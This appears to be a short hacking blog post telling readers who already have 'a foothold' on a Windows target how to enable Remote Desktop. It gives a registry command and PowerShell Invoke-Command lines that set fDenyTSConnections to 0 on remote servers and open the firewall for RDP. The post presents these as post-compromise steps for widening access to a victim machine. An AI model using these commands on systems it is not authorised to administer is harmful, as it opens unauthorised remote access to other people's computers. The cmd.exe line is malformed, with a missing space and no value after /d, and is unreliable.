[ Hacker Night School ] :: Got a foothold on a Windows target? Now enable Remote Desktop.

Want to make your life easier once you’ve gotten a foothold on your Windows target? Enable Remote Desktop. See this article:

https://www.interfacett.com/blogs/how-to-remotely-enable-and-disable-rdp-remote-desktop/

TL;DR:

In cmd.exe:

Reg add\\computername\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server  /v fDenyTSConnections /t REG_DWORD /d /f

In Powershell:

Invoke-Command –Computername “server1”, “Server2” –ScriptBlock {Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value 0}
Don’t forget to allow RDP through the firewall:
Invoke-Command –Computername “server1”, “Server2” –ScriptBlock {Enable-NetFirewallRule -DisplayGroup "Remote Desktop"}
Now have fun!